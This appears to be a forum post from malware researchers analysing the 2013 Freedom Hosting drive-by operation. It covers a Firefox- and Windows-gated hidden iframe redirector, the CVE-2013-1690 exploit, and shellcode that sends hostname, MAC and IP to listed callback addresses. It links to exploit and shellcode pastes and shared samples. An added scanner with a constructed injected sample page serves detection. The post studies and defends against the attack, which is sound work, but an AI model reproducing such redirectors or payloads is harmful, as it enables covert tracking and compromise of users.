Background:
This is purely a case of state-sponsored malware; the infection of the domain name that was spotted to be infected was backed by a search warrant.
The infection ran in Onionland on the Freedom Hosting website(s) in 2013, aimed at child porn suspects using a mass drive-by download method. The court documentation, spotted recently in 2014, legitimised the use of the mass-infection technique for search purposes (investigation details) through a regular search warrant signed by the district court of Nebraska, US.
Details of malware, its distribution & purpose:
1. These are the variants of the code implemented to infect, injected into some pages of the Freedom Hosting site: a malicious JavaScript iframer whose conditions target Firefox (browser) and Windows NT (OS). Note the cookie method used and the callback.
http://pastebin.com/bu2Ya0n6
2. One of the above codes redirects the visitor to the specific .onion "infector" site stated in point (1) above, using malicious obfuscated JavaScript to exploit the (at that time) vulnerable version of Firefox with the 0day CVE-2013-1690 in order to plant the payload (a shellcode), while one of the codes was sending a beacon for the infection initiation to:
IP Address: 65.222.202.53
City: Triadelphia
State or Region: West Virginia
Country: United States
ISP: Verizon Business
Latitude & Longitude: 40.0900, -80.6220
Domain: verizonbusiness.com
ZIP Code: 26059
The infector script, with some deobfuscation we researched, is here: http://pastebin.com/RTwsyrH8
3. The above obfuscated JavaScript (2) exploited the Firefox 0day of that time to gain the ability to execute malicious shellcode (under a Win x32 environment) performing the malicious actions detailed below; the shellcode was analysed using radare, as shown in the snippet in the picture below.
The 0day exploitation can be viewed in the references below and is not a subject to be discussed here:
https://cve.mitre.org/cgi-bin/cvename.c ... -2013-1690
https://bugzilla.mozilla.org/show_bug.cgi?id=901365
https://www.mozilla.org/security/announ ... 13-53.html
The shellcode analysis can be viewed here: http://pastebin.com/aFUP2gLB, followed by a behavior test to confirm the reversed information and avoid a false positive in the verdict.
4. By (1) crafting the shellcode into an EXE and running it, and (2) simulating the infection with the Tor-bundled Firefox, we could positively reproduce the CNC callback, as per the snapshot below:
It calls the neighbor IP of the callback IP stated above, in the ghost network of:
65.222.202.54 ASN: 701 / UUNET
Prefix: 65.192.0.0/11
Vienna, Virginia, United States, North America
38.9012,-77.2653 Verizon Business
5. The malicious activity verdict:
The malicious hidden IFRAME redirector, driven by JavaScript and implemented in some pages under the Freedom Hosting site in the Tor network (on the same server as TorMail), redirects users matching the criteria Windows OS and Firefox browser to the callback IP or the specific .onion domain for the 0day exploit (CVE-2013-1690), which executes the shellcode as the payload. The shellcode sends an HTTP/1.1 GET request containing a specific URL, with the TCP/IP packet carrying the IP address and MAC address of the infected PC. The MAC address, grabbed by SendARP@IPHLPAPI.DLL, and the hostname of the infected PC, grabbed by gethostbyname@WS2_32.DLL and gethostname@WS2_32.DLL in the shellcode, are sensitive unique information that requires the user's consent before being sent to a remote environment, yet they were sent.
The cookie installed on PCs accessing the Freedom Hosting sites, used in a tracking scheme to match the redirected user's status, was installed on PCs matching the criteria described in point (1).
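For site operators who want to check their own pages for the injected redirector pattern described in points (1) and (5), here is an added heuristic scanner (example code, not MMD's analysis tooling and not the Freedom Hosting script itself). The exact markers it looks for (a hidden iframe, a navigator.userAgent gate on both "Windows NT" and "Firefox", a document.cookie write, a .onion target) and the two sample pages are assumptions constructed for the example.

```python
import re

# Indicator patterns (assumptions derived from the report's description).
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:width\s*=\s*[\"']?0|height\s*=\s*[\"']?0"
    r"|display\s*:\s*none|visibility\s*:\s*hidden)[^>]*>", re.I)
UA_CHECK = re.compile(r"navigator\.userAgent", re.I)
UA_FIREFOX = re.compile(r"Firefox", re.I)
UA_WINDOWS = re.compile(r"Windows\s*NT", re.I)
COOKIE_SET = re.compile(r"document\.cookie\s*=", re.I)
ONION_URL = re.compile(r"https?://[a-z2-7]{16}\.onion", re.I)  # v2 onion names of 2013


def scan_page(html: str) -> dict:
    """Return which redirector indicators appear in one HTML document plus a score."""
    hits = {
        "hidden_iframe": bool(HIDDEN_IFRAME.search(html)),
        # The report's targeting criteria: browser is Firefox AND OS is Windows NT.
        "ua_gate": bool(UA_CHECK.search(html) and UA_FIREFOX.search(html)
                        and UA_WINDOWS.search(html)),
        "cookie_set": bool(COOKIE_SET.search(html)),
        "onion_target": bool(ONION_URL.search(html)),
    }
    score = sum(hits.values())
    hits["score"] = score
    return hits


def is_redirector(html: str, threshold: int = 3) -> bool:
    """Flag a page when at least `threshold` indicators co-occur (threshold is an assumption)."""
    return scan_page(html)["score"] >= threshold


# Constructed samples: a benign page with an ordinary embed and cookie, and one
# carrying a UA-gated hidden iframe to a (made-up) .onion address.
CLEAN_PAGE = """<html><body><iframe src="https://example.com/embed" width="600" height="400"></iframe>
<script>document.cookie = "lang=en";</script></body></html>"""

INJECTED_PAGE = """<html><body><p>forum index</p><script>
var ua = navigator.userAgent;
if (ua.indexOf("Windows NT") != -1 && ua.indexOf("Firefox") != -1) {
  document.cookie = "uid=1; path=/";
  document.write('<iframe src="http://abcdefghijklmnop.onion/" width="0" height="0"></iframe>');
}
</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_page(page), "flagged" if is_redirector(page) else "ok")
```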
6. The privacy violation verdict:
After a thorough investigation, we confirmed beyond any doubt that the sensitive information (READ: PRIVACY) of multinational users can be violated by the implementation of this malware for legal investigation; in this specific case we can confirm the following violation points:
(1) Silently sending the infected PC's hostname,
(2) Silently sending the MAC address (attached in the TCP packet) and ARP,
(3) The IP address is sent to this remote host without proper mention,
(4) The cookie silently installed on the infected PC can be used for tracking purposes.
7. Sample
The payload is the shellcode binary (hex file); we uploaded the sample to VT here:
VT: https://www.virustotal.com/en/file/7441 ... 380104138/
It has a detection ratio of 2/48; a file with the same hash had already been uploaded by another individual researcher we did not know beforehand.
To share with the members of KM, we uploaded the shellcode sample and the crafted EXE samples.
8. The point of this report:
The point of this report is to clarify the real facts, for you to see and judge for yourselves, as fellow malware researchers, whether the usage of such mass-infection malware can be allowed morally or not. Once we let it happen, this method will undoubtedly be re-used, over and over and over again, and will encourage other countries to do the same, opening the possibility that someday we may face a wild wild west internet where good people, cops and crooks are all using malware to battle each other.
Malware is bad by default and by nature; it was built on the concept of infect-duplicate-steal-control-destroy victims, and is a subject to be avoided by good fellows. No single country's law is ever "enough" to allow the mass multinational infection of it, for whatever reason.
Due to this, we at MMD protest the usage of this malware, as posted here as the background information: http://blog.malwaremustdie.org/2014/08/ ... d-any.html
9. Reference:
https://www.documentcloud.org/documents ... davit.html
http://www.wired.com/2014/08/operation_torpedo/
http://reason.com/blog/2014/08/06/fbi-t ... -tor-users
http://www.wowt.com/home/headlines/Fed- ... 16621.html
http://www.wired.com/2013/08/freedom-hosting/
http://xerocrypt.wordpress.com/2013/08/ ... ghty-list/
https://www.virusbtn.com/blog/2013/08_05.xml
https://krebsonsecurity.com/2013/08/fir ... porn-hunt/
https://blog.torproject.org/blog/hidden ... om-hosting
Thank you for kindly reading this report. This is the work of a team effort, not an individual, and not only MMD.
I did the analysis of the shellcode parts (pastebin in point 3) and compiled the overall evidence.
There are so many references; I picked those closest to the source, using a strict filter, since the infection was realized in mid 2013 and some objects have been deleted from the internet.
What's bad is just bad, and malware is bad. Don't use it; there will always be more damage than good.
Best regards
#MalwareMustDie - KernelMode rocks!
Attachments
RAR5, password: infected
Noted: Sample is shared to KM community
(1.89 KiB) Downloaded 63 times